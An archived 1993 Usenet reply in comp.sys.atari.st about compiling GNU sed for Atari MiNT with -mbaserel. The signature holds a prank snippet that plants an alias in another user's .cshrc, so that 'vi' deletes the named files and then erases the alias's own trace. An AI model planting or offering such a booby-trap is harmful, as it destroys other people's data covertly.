home *** CD-ROM | disk | FTP | other *** search
/ NetNews Usenet Archive 1993 #1 / NN_1993_1.iso / spool / comp / sys / atari / st / 19389 < prev    next >
Encoding:
Internet Message Format  |  1993-01-08  |  1.8 KB

  1. Path: sparky!uunet!zaphod.mps.ohio-state.edu!howland.reston.ans.net!sol.ctr.columbia.edu!ira.uka.de!smurf.sub.org!tyrell.tynet.sub.org!marsu.tynet.sub.org!wenzel
  2. From: wenzel@marsu.tynet.sub.org (Markus Wenzel)
  3. Newsgroups: comp.sys.atari.st
  4. Message-ID: <H.ea.ja_lKmjDloU@marsu.tynet.sub.org>
  5. Organization: Palumbian Networks Ltd.
  6. Subject: Re: GNU SED v1.13 ported to Atari
  7. References: Re: GNU SED v1.13 ported to Atari
  8. Reply-To: wenzel@marsu.tynet.sub.org
  9. X-Software: HERMES GUS 1.04 Rev. Sep  5 1992
  10. Date: Thu, 07 Jan 1993 12:35:36 MET
  11. Lines: 28
  12.  
  13. In <1993Jan2.053420.3932@tdb.uu.se>, Daniel Eriksson writes:
  14. > The port was made with GCC 2.3.1 PL1 and MiNTlibs PL25 and was
  15. > very straightforward. I haven't had the opportunity to test all its
  16. > functions, but the ones I've tested works as they were intended. I'm
  17. > not sure how well the port works under plain TOS since I'm always
  18. > running MiNT (but I can't really see any point in running it from
  19. > plain TOS anyway :-). I also tried to compile SED with -mbaserel
  20. > and -mpcrel, but somehow I couldn't get sed to run that way. It
  21. > compiled and linked OK, but the executable only gave me a bus-error.
  22. > It's probably some awfully silly thing that I'm doing wrong. I was
  23. > under the impression that compiling with -mbaserel and -mpcrel would
  24. > TRY to create a text-segment without absolute addresses. Am I missing
  25. > something out?
  26. Are you sure you linked with libs that were also compiled with -mbaserel?
  27. I compiled tcsh 6.00 and make 3.62 that way and it works just fine.
  28.  
  29. Regards, Markus.
  30.  
  31. -- 
  32. /dev                Markus Wenzel, University of Stuttgart
  33. /usr/spool/mail     wenzel@marsu.tynet.sub.org / @rus.uni-stuttgart.de
  34. ~/.ircrc/nick       Marsu
  35.  
  36. ### check this out with users you don't like:
  37. cat >> ~luser/.cshrc
  38. alias vi 'rm \!*;unalias vi;grep -v BoZo ~/.cshrc > ~/.z;mv -f ~/.z ~/.cshrc'
  39. ^D
  40.  
  41.